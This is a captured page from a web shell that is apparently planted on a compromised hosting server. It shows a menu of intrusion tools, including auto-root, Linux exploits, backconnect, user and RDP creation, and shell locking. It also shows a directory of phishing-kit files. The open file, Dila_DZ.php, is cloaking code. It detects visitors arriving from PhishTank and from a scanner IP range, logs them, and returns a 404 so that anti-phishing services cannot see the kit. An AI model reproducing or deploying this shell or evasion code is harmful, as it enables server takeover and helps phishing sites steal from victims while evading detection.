Linux server541.iseencloud.net 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
LiteSpeed
: 162.55.65.66 | : 216.73.216.88
Cant Read [ /etc/named.conf ]
8.1.34
ensafein
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home2 /
ensafein /
public_html /
products /
[ HOME SHELL ]
Name
Size
Permission
Action
config
[ DIR ]
drwxr-xr-x
Dila_DZ.php
1.18
KB
-rw-r--r--
antibot.php
1.98
KB
-rw-r--r--
blacklists.php
7.81
KB
-rw-r--r--
error_log
938.26
KB
-rw-r--r--
index.php
1.04
KB
-rw-r--r--
proxyblock.php
2.79
KB
-rw-r--r--
visit.txt
16.43
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Dila_DZ.php
<?php if(isset($_SERVER['HTTP_REFERER'])) { if(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) == 'phishtank.com') { $content = "#> ".$_SERVER['HTTP_USER_AGENT']." [ Phishtank ] \r\n"; $save=fopen("../../bots.txt","a+"); fwrite($save,$content); fclose($save); header("HTTP/1.0 404 Not Found");exit(); } } if(isset($_SERVER['HTTP_REFERER'])) { if(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) == 'www.phishtank.com') { $content = "#> ".$_SERVER['HTTP_USER_AGENT']." [ Phishtank ] \r\n"; $save=fopen("../../bots.txt","a+"); fwrite($save,$content); fclose($save); header("HTTP/1.0 404 Not Found");exit(); } } ### Check if the ip between 146.112.0.0 And 146.112.255.255 ### $range_start = ip2long("146.112.0.0"); $range_end = ip2long("146.112.255.255"); $ip2long = ip2long($_SERVER['REMOTE_ADDR']); if ($ip2long >= $range_start && $ip2long <= $range_end){ $content = "#> ".$_SERVER['HTTP_USER_AGENT']." [ Blacklist ] \r\n"; $save=fopen("../../bots.txt","a+"); fwrite($save,$content); fclose($save); header("HTTP/1.0 404 Not Found");exit(); } ?>
Close